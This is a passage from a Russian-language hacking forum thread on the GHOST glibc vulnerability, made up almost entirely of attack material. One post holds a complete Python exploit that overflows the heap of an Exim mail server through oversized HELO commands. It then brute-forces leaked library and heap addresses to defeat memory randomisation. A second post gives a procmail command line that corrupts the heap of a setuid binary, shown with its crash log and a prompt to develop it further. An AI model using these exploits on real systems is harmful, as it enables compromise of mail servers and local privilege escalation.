nfs-utils, nginx, nodejs, openldap, openssh, postfix, proftpd,
pure-ftpd, rsyslog, samba, sendmail, sysklogd, syslog-ng, tcp_wrappers,
vsftpd, xinetd.
http://www.openwall.com/lists/oss-security/2015/01/27/18
12309 вне форума   Ответить с цитированием
Старый 16.02.2015, 11:51   #3
slashd
 
Регистрация: 06.07.2010
Сообщений: 47
Репутация: 27
По умолчанию memleak in exim

В общем сделал мемлик для exim'a на ubuntu 12.04 x64.
Тот способ мемлика о котором писали на опенволле не получилось реализовать, пришлось написать небольшой брутер.
Для теста добавить в конфиг exim'а
"helo_try_verify_hosts = *"

Код:
#!/usr/bin/python

# rdot.org/forum
# memleak ghost/exim 4.76/ubuntu12.04

import socket
import random
import string
import telnetlib
import commands
import sys
import signal
from struct import pack, unpack

addr = ('192.168.0.223', 25)

counter = 0

data1  = 'A' * 8
data1 += pack('<Q', 0x0000000000006b30)
data1 += 'C' * 8
data1 += pack('<Q', 0x0000000000006b30)
data1 += pack('<Q', 0x0000000000fefe00)
data1 += pack('<Q', 0x0000000000000031)

data2  = pack('<Q', 0x0000000000000000) * (140+133) # SISKI
data2 += pack('<Q', 0x000000000000eab0) # malloc_chunk->prev_size
data2 += pack('<Q', 0x0000000000002020) # malloc_chunk->size
data2 += pack('<Q', 0x0000000000000000) # storeblock->next   = NULL
data2 += pack('<Q', 0x0000000000442000) # storeblock->length = FAKE
data2 += '\n.\n'

data3  = pack('<Q', 0x0000000000000000) * (140+133) # SISKI
data3 += pack('<Q', 0x00000000000155c0) # malloc_chunk->prev_size
data3 += pack('<Q', 0x0000000000002020) # malloc_chunk->size
data3 += pack('<Q', 0x0000000000000000) # storeblock->next   = NULL
data3 += pack('<Q', 0x0000000000002000) # storeblock->length = FAKE
data3 += '\n.\n'

def timeout_handler(signum, frame):
    raise Exception

def CREATE_SOCK(addr):
    global counter
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(addr)
    counter += 1
    return s

def PREPARE_HEAP_LEAK(t, what='lib', check=False):
#    t = telnetlib.Telnet()
#    t.sock = sock

    t.read_until("+0400")

    t.write('MAIL FROM: A@' + 'Q' * 510 + '\n')
    t.read_until('250 OK')

    t.write('RCPT TO: S@' + 'W' * 510 + '\n')
    t.read_until("250 Accepted")

    t.write('RCPT TO: D@' + 'E' * 510 + '\n')
    t.read_until("250 Accepted")

    t.write('RCPT TO: F@' + 'R' * 510 + '\n')
    t.read_until("250 Accepted")

    t.write('RSET\n')
    t.read_until('250 Reset OK')

    t.write('MAIL FROM: A@' + 'Q' * 510 + '\n')
    t.read_until("250 OK")

    t.write('RCPT TO: G@' + 'T' * 510 + '\n')
    t.read_until("250 Accepted")

    t.write('RCPT TO: H@' + 'Y' * 510 + '\n')
    t.read_until("250 Accepted")

    t.write('RCPT TO: J@' + 'U' * 329 + '\n')
    t.read_until("250 Accepted")

    t.write('DATA\n')
    t.read_until("by itself")

    t.write(data1 * 200 + '\n.\n')
    t.sock.recv(1024)

    # 8208 bytes
    # 8224 bytes free 
    # 8224 bytes PERM
    #



    t.write('HELO ' + '0' * (1900-1) + '\n')
    t.read_until(']')

    # 8208 bytes
    # 1920 bytes 
    # 1952 bytes 
    # 4352 bytes free
    # 8224 bytes PERM


    t.write('MAIL FROM: A@' + 'Q' * 510 + '\n')
    t.read_until("250 OK")

    t.write('RCPT TO: S@' + 'W' * 510 + '\n')
    t.read_until("250 Accepted")

    t.write('RCPT TO: D@' + 'E' * 510 + '\n')
    t.read_until("250 Accepted")

    t.write('RCPT TO: F@' + 'R' * 510 + '\n')
    t.read_until("250 Accepted")

    t.write('RCPT TO: S@' + 'W' * 510 + '\n')
    t.read_until("250 Accepted")

    t.write('RCPT TO: D@' + 'E' * 510 + '\n')
    t.read_until("250 Accepted")

    t.write('RCPT TO: F@' + 'R' * 510 + '\n')
    t.read_until("250 Accepted")

    t.write('RCPT TO: S@' + 'W' * 510 + '\n')
    t.read_until("250 Accepted")

    t.write('RCPT TO: D@' + 'E' * 510 + '\n')
    t.read_until("250 Accepted")

    t.write('RSET\n')
    t.read_until('250 Reset OK')

    t.write('MAIL FROM: A@' + 'Q' * 510 + '\n')
    t.read_until("250 OK")

    t.write('RCPT TO: G@' + 'T' * 510 + '\n')
    t.read_until("250 Accepted")

    t.write('DATA\n')
    t.read_until("by itself")

    t.write(data1 * 400 + '\n.\n')
    t.sock.recv(1024)

    # 8208 bytes
    # 1920 bytes 
    # 1952 bytes 
    # 4352 bytes free
    # 8224 bytes PERM
    # 2 * 8224 bytes free
    # 8224 bytes PERM 


    t.write('HELO ' + '0' * (1900 - 4) + '.19' + '\n')
    #t.write('HELO ' + '0' * (2000 - 1) + '\n')
    t.read_until(']')

    t.write('MAIL FROM: A@' + 'Q' * 510 + '\n')
    t.read_until("250 OK")

    t.write('RCPT TO: S@' + 'W' * 510 + '\n')
    t.read_until("250 Accepted")

    t.write('RCPT TO: D@' + 'E' * 510 + '\n')
    t.read_until("250 Accepted")

    t.write('RCPT TO: F@' + 'R' * 510 + '\n')
    t.read_until("250 Accepted")

    # 8208 
    # 3872 free
    # 2016
    # 2048
    # 288  free
    # 8224 PERM
    # 8224 TIME
    # 8224 free
    # 8224 PERM


    t.write('RCPT TO: G@' + 'T' * 510 + '\n')
    t.read_until("250 Accepted")

    t.write('RCPT TO: G@' + 'T' * 510 + '\n')
    t.read_until("250 Accepted")

    t.write('RCPT TO: G@' + 'T' * 510 + '\n')
    t.read_until("250 Accepted")



    # DO HEAP OVERFLOW

    t.write('HELO ' + '0' * (2000 - 1) + '.19' + '\n')
    #t.write('HELO ' + '0' * (2000 - 1) + '\n')
    t.read_until(']')

#    raw_input("AAAA")
    # WHAT SEE PTMALLOC2                || REAL

    # 8208
    # 2016 
    # 3872 free
    # 2048          85c170 -> 85c96f    ||  2048    HELO    85c170 -> 85c96f
    # 288   free    85c970 -> 86029f    ||  288     free
    # 8224  free    85ca90 -> 86029f    ||  8224    PERM    85ca90 -> 85eaaf
    # 6128  free    85eab0 -> 86029f    ||  6128    free    85eab0 -> 860acf
    #                                   ||  2096    free    8602a0 -> 860acf
    # 8224  PERM    860ad0 -> 862aef





    t.write('MAIL FROM: A@' + 'Q' * 510 + '\n')
    t.read_until("250 OK")

    t.write('RCPT TO: S@' + 'W' * 510 + '\n')
    t.read_until("250 Accepted")

    t.write('RCPT TO: D@' + 'E' * 510 + '\n')
    t.read_until("250 Accepted")

    t.write('RCPT TO: F@' + 'R' * 510 + '\n')
    t.read_until("250 Accepted")

    t.write('RCPT TO: G@' + 'T' * 510 + '\n')
    t.read_until("250 Accepted")

    t.write('RCPT TO: G@' + 'T' * 510 + '\n')
    t.read_until("250 Accepted")

    t.write('RCPT TO: G@' + 'T' * 510 + '\n')
    t.read_until("250 Accepted")

    t.write('HELO ' + '0' * (2500 - 1) + '\n')
    t.read_until(']')

    t.write('HELO ' + '0' * (1000 - 1) + '\n')
    t.read_until(']')


    t.write('MAIL FROM: A@' + 'M' * 99 + '\n')
    t.read_until("250 OK")

    t.write('RCPT TO: S@' + 'W' * 320 + '\n')
    t.read_until("250 Accepted")

    t.write('RCPT TO: S@' + 'W' * 510 + '\n')
    t.read_until("250 Accepted")

    t.write('RCPT TO: D@' + 'E' * 510 + '\n')
    t.read_until("250 Accepted")

    t.write('RCPT TO: F@' + 'R' * 510 + '\n')
    t.read_until("250 Accepted")

    t.write('RCPT TO: G@' + 'T' * 510 + '\n')
    t.read_until("250 Accepted")

    t.write('RCPT TO: G@' + 'T' * 510 + '\n')
    t.read_until("250 Accepted")


    t.write('DATA\n')
    t.read_until("by itself")

    if what == 'lib':
        t.write(data2)
        t.sock.recv(1024)

        t.write('MAIL FROM: A@' + 'M' + '\n')
        t.read_until("250 OK")

        t.write('RCPT TO: S@' + 'W' + '\n')
        t.read_until("250 Accepted")

        t.write('RCPT TO: S@' + 'W' * 320 + '\n')
        t.read_until("250 Accepted")

        t.write('RCPT TO: S@' + 'W' * 510 + '\n')
        t.read_until("250 Accepted")

        t.write('RCPT TO: D@' + 'E' * 230 + '\n')
        t.read_until("250 Accepted")

    elif what == 'heap':
        t.write(data3)
        t.sock.recv(1024)

        t.write('MAIL FROM: A@' + 'M' + '\n')
        t.read_until("250 OK")

        t.write('RCPT TO: S@' + 'W' + '\n')
        t.read_until("250 Accepted")

        t.write('RCPT TO: S@' + 'W' * 320 + '\n')
        t.read_until("250 Accepted")

        t.write('RCPT TO: S@' + 'W' * 510 + '\n')
        t.read_until("250 Accepted")

        t.write('RCPT TO: D@' + 'E' * 140 + '\n')
        t.read_until("250 Accepted")



    t.write('DATA\n')
    t.read_until("by itself")

    if what == 'lib':
        for i in range(1,1145):
            t.write('\x00')
        for i in range(1,49):
            t.write('\x00')

    elif what == 'heap':

        for i in range(0,96):
            t.write('\x01')

#    for i in range(1,163-18):
#        t.write('\x00')

#    raw_input("BBBB")
    return t

    # now we are at (FILE *) smtp_out->_lock
    # BAD IDEA TRY REWRITE smtp_out->_lock ,beacouse will be deadlock and process hung

    # is the best rewrite smpt_out->_IO_read_end, then shutdown write-sock and search "421 Lost incoming connection"
    
# if (what = 'lib') then try do memleak where libraries stay
# if (what = 'heap') then try bruteforce where heap stays (it will be random offset from lib)

signal.signal(signal.SIGALRM, timeout_handler)

memleak = '\x00'


def CHECK(c):
    s = CREATE_SOCK(addr)
    t = telnetlib.Telnet()
    t.sock = s

    PREPARE_HEAP_LEAK(t, True)

    for i in range(0, len(memleak)):
        t.write(memleak[i])

    t.write(c)

    signal.alarm(3)
    try:
        s.shutdown(socket.SHUT_WR)
        s.recv(1024)
        signal.alarm(0)
        return True
    except Exception:
        return False




for j in range(0,5):
    for i in range(0,256):
        if ((j == 0) and (i % 16 != 0)):
            continue
        byte = pack('B', i)

#        print "TRY[" + str(j) + "] BYTE => " + hex(i)

        s = CREATE_SOCK(addr)
        t = telnetlib.Telnet()
        t.sock = s
        PREPARE_HEAP_LEAK(t)

        for k in range(0, len(memleak)):
            t.write(memleak[k])

        t.write(byte)
    
        s.shutdown(socket.SHUT_WR)
        mess = s.recv(1024)
        if mess != '':
            print "Find sym[" + str(j) + "] => " + hex(i)
            memleak += byte
            break

memleak += '\x00\x00'
print hex(unpack('<Q', memleak)[0])

libend = unpack('<Q', memleak)[0] + 0x4000

def CHECK_ADDR(try_off):
    s = CREATE_SOCK(addr)
    t = telnetlib.Telnet()
    t.sock = s

    PREPARE_HEAP_LEAK(t, 'heap')

    check = pack('<Q', try_off)

    for k in range(0, len(check)):
        t.write(check[k])

    s.shutdown(socket.SHUT_WR)
    mess = s.recv(1024)

    if mess != '':
        return True
    else:
        return False

for j in range(0,65535):
    try_off = libend + (j * 0x1000)
#    print "TRY => " + hex(try_off)

    if CHECK_ADDR(try_off + 0x100) == True:
        if CHECK_ADDR(try_off + 0x1000) == True:
            if CHECK_ADDR(try_off + 0x13100) == True:
                if CHECK_ADDR(try_off + 0x2100) == False:
                    if CHECK_ADDR(try_off + 0x10100) == False:
                        if CHECK_ADDR(try_off + 0x9100) == False:
                            print "Found heap! => " + hex(try_off)
                            print "Total counts to server => " + str(counter)
                            break
#    s = CREATE_SOCK(addr)
#    t = telnetlib.Telnet()
#    t.sock = s
#    PREPARE_HEAP_LEAK(t, 'heap')

#    for k in range(0, len(check)):
#        t.write(check[k])

#    s.shutdown(socket.SHUT_WR)
#    mess = s.recv(1024)
#    if mess != '':
#        print mess + " => HEAP? => " + hex(try_off - 0x100)
#    else:
#        break
slashd вне форума   Ответить с цитированием
Старый 30.03.2015, 21:33   #4
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Код:
/usr/bin/procmail 'VERBOSE=on' 'COMSAT=@'`python -c "print '0' * $((0x500-16*1-2*4-1-4))"` < /dev/null

procmail: [4981] Mon Mar 30 22:31:20 2015
procmail: Assigning "COMSAT=@000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
procmail: Locking "/var/mail/an.lock"
procmail: Assigning "LASTFOLDER=/var/mail/an"
procmail: Opening "/var/mail/an"
procmail: Acquiring kernel-lock
procmail: Unlocking "/var/mail/an.lock"
procmail: Notified comsat: "an@41:/var/mail/an"
*** glibc detected *** /usr/bin/procmail: free(): invalid next size (normal): 0x0933af38 ***
======= Backtrace: =========
/lib/i386-linux-gnu/libc.so.6(+0x6f751)[0x17f751]
/lib/i386-linux-gnu/libc.so.6(+0x7107b)[0x18107b]
/lib/i386-linux-gnu/libc.so.6(cfree+0x6d)[0x18420d]
/usr/bin/procmail[0x8054b5e]
/usr/bin/procmail[0x80507a4]
/usr/bin/procmail[0x804ea84]
/usr/bin/procmail[0x8050d64]
/usr/bin/procmail[0x804b5a6]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xe7)[0x126e37]
/usr/bin/procmail[0x80495c1]
======= Memory map: ========
00110000-00271000 r-xp 00000000 08:01 3285397    /lib/i386-linux-gnu/libc-2.13.so
00271000-00272000 ---p 00161000 08:01 3285397    /lib/i386-linux-gnu/libc-2.13.so
00272000-00274000 r--p 00161000 08:01 3285397    /lib/i386-linux-gnu/libc-2.13.so
00274000-00275000 rw-p 00163000 08:01 3285397    /lib/i386-linux-gnu/libc-2.13.so
00275000-00278000 rw-p 00000000 00:00 0 
00293000-002af000 r-xp 00000000 08:01 3285319    /lib/i386-linux-gnu/ld-2.13.so
002af000-002b0000 r--p 0001b000 08:01 3285319    /lib/i386-linux-gnu/ld-2.13.so
002b0000-002b1000 rw-p 0001c000 08:01 3285319    /lib/i386-linux-gnu/ld-2.13.so
003d7000-003d8000 r-xp 00000000 00:00 0          [vdso]
0081a000-0083e000 r-xp 00000000 08:01 3285399    /lib/i386-linux-gnu/libm-2.13.so
0083e000-0083f000 r--p 00023000 08:01 3285399    /lib/i386-linux-gnu/libm-2.13.so
0083f000-00840000 rw-p 00024000 08:01 3285399    /lib/i386-linux-gnu/libm-2.13.so
00855000-0085b000 r-xp 00000000 08:01 3285391    /lib/i386-linux-gnu/libnss_compat-2.13.so
0085b000-0085c000 r--p 00005000 08:01 3285391    /lib/i386-linux-gnu/libnss_compat-2.13.so
0085c000-0085d000 rw-p 00006000 08:01 3285391    /lib/i386-linux-gnu/libnss_compat-2.13.so
00a41000-00a4b000 r-xp 00000000 08:01 3284064    /lib/i386-linux-gnu/libnss_files-2.13.so
00a4b000-00a4c000 r--p 00009000 08:01 3284064    /lib/i386-linux-gnu/libnss_files-2.13.so
00a4c000-00a4d000 rw-p 0000a000 08:01 3284064    /lib/i386-linux-gnu/libnss_files-2.13.so
00b45000-00b5f000 r-xp 00000000 08:01 3277661    /lib/i386-linux-gnu/libgcc_s.so.1
00b5f000-00b60000 r--p 00019000 08:01 3277661    /lib/i386-linux-gnu/libgcc_s.so.1
00b60000-00b61000 rw-p 0001a000 08:01 3277661    /lib/i386-linux-gnu/libgcc_s.so.1
00dfa000-00e03000 r-xp 00000000 08:01 3285313    /lib/i386-linux-gnu/libnss_nis-2.13.so
00e03000-00e04000 r--p 00008000 08:01 3285313    /lib/i386-linux-gnu/libnss_nis-2.13.so
00e04000-00e05000 rw-p 00009000 08:01 3285313    /lib/i386-linux-gnu/libnss_nis-2.13.so
00f07000-00f1a000 r-xp 00000000 08:01 3285315    /lib/i386-linux-gnu/libnsl-2.13.so
00f1a000-00f1b000 r--p 00012000 08:01 3285315    /lib/i386-linux-gnu/libnsl-2.13.so
00f1b000-00f1c000 rw-p 00013000 08:01 3285315    /lib/i386-linux-gnu/libnsl-2.13.so
00f1c000-00f1e000 rw-p 00000000 00:00 0 
08048000-0805a000 r-xp 00000000 08:01 2102017    /usr/bin/procmail
0805a000-0805b000 r--p 00011000 08:01 2102017    /usr/bin/procmail
0805b000-0805c000 rw-p 00012000 08:01 2102017    /usr/bin/procmail
09337000-09358000 rw-p 00000000 00:00 0          [heap]
b7700000-b7721000 rw-p 00000000 00:00 0 
b7721000-b7800000 ---p 00000000 00:00 0 
b789f000-b78a1000 rw-p 00000000 00:00 0 
b78b7000-b78b9000 rw-p 00000000 00:00 0 
bfab4000-bfad5000 rw-p 00000000 00:00 0          [stack]
Аварийный останов
пилите, Шура, пилите, оно же суидное
Pashkela вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot